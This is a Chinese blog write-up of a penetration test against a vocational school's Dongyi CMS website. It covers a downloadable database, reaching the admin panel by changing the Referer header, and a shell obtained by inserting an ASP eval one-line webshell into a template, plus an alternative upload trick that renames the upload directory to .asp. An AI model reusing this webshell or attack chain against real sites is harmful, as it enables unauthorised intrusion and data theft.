DYBOY's Blog

[渗透实战]记录某职业中学测试

记录一下对于一个职业学院的渗透测试过程。

团队的力量很强大,安全无小事!

0x01 偶遇&吐槽:

在机缘巧合下,遇见了这个网站,发现有一个旧版网站,还是动易的CMS,指纹查看一下:

指纹识别

网站中还存在这些有趣的东西:

为什么不清理痕迹

然后使用御剑扫了一下,发现可以下载数据库,然后我就把这个洞,提交给了360的补天平台,好歹算个学校吧,一共提交了两次,第一次说漏洞不够详细。。。(一个数据库下载漏洞,能有多详细,难道还能把数据下载了发你不成)。

第二次我修改了提交,审核说,漏洞存在,但是不构成威胁…(这审核是实习生吧?)

360补天审核过程

真的是无语的审核了,本来有接近一年没去补天,就是因为审核的原因,本以为一年后会好一些,没想到。。。虽然平台不怎么样,但是补天的线下沙龙还是做的很不错的。

因此下面在各位团队成员的深挖下,验证了此网站并不是固若金汤!


0x02 深入测试:

在数据库中找到了一个user表,在网站的新闻中心有一个登陆表单,登录后,进入用户管理后台:

用户中心

其实这个算不上后台,有上传点,但是没法儿利用,看到url中的user就知道是用户中心而非管理后台了,动易的管理后台登录地址为:/Admin/Admin_login.asp

在数据库中找到admin账户,登陆发现:

登陆管理

问了一下X1r0z这个女装大佬[滑稽],需要修改Referer中的参数,去掉81port,分析认为:这是一个旧版网站,原本是80端口的,管理员为了保留就转移到了81端口,但是动易的程序在后台并没有修改判断条件,就导致了怎么登陆也进入不了后台的情况

现在成功登录后台,登录的时候需要设置referer,其他的不需要

登陆管理后台


0x03 获取Shell:

X1r0z提供的方法是在系统管理的下载中心中倒腾,我就直接修改模版了,因为兼容性的问题,按钮没反应,所以就使用IE6一点点弄的,真的很麻烦…

一个过狗的ASP小马

<% 
dim x1,x2 
x1 = request("x") 
x2 = x1 
eval x2 
%>

插入小马

最后连接得到:

拿到shell

0x04 总结:

当然已经做好了善后的工作,已经清除了小马,帮管理员填上了洞,数据库确实没办法了。推荐大家提交CNVD或者漏洞盒子,漏洞银行或者对应的SRC厂商!

最后再强调一下,团队的力量是强大的,安全无小事!!!


0x05 补充:

以下内容来自 X1r0z 小裙子 (<_<)

系统设置 - 网站频道管理 - 下载中心 - 频道类型

将 上传文件的保存目录 改成 test.asp

最后左栏找到对应的频道直接上传, 抓包的路径不全, 还需要手动拼接下.

下载中心的目录为 /Soft/

其它频道的目录在 频道类型 - 频道目录 里.

标签:渗透测试
版权声明:《 [渗透实战]记录某职业中学测试 》为DYBOY原创文章未经允许不得转载。

 DYBOY
 作者签名:安全从业者,爱好安全产品开发,渗透测试,Web漏洞研究

发表评论:

用心评论~

帅人已评:

知意
2018-07-14 15:44
思路这么骚?
猪在树上爬
2018-07-14 09:47
牛批
TOP
Powered by Emlog | Theme:Monkey by DYBOY
渝ICP备16008772号
sitemap